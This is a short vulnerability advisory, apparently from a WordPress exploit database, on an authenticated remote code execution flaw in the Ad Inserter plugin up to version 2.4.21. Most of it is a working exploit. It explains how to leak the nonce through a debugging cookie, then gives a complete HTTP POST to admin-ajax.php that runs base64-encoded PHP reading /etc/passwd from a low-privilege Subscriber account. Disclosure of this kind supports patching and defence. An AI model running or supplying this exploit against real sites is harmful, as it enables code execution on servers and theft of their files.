wpexploit | Ryan Dewhurst | WPEX-ID: FBFA36DC-7028-4A31-8A68-4B02DA80290C
Jul 15, 2019

Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution

EPSS: 0.008 (percentile 81.5%)

The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin, in versions up to and including 2.4.21, is affected by an authenticated remote code execution vulnerability: the ad-code preview handler reached through admin-ajax.php accepts attacker-supplied PHP from any logged-in user, not only administrators.

The nonce (sent as ai_check in the final request) can be obtained by requesting the homepage with the AI_WP_DEBUGGING cookie set to 2; the plugin's debugging output then exposes the nonce value to the unauthenticated visitor.

Then, using an account with a role as low as Subscriber, send the request below. The Cookie header must carry that account's logged-in WordPress session, the code parameter is the base64 encoding of <?php echo file_get_contents('/etc/passwd'); ?>, and php=1 marks the submitted code as PHP to be executed by the preview:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://127.0.0.1
Connection: close
Cookie: [SNIPPED]
Upgrade-Insecure-Requests: 1

action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1
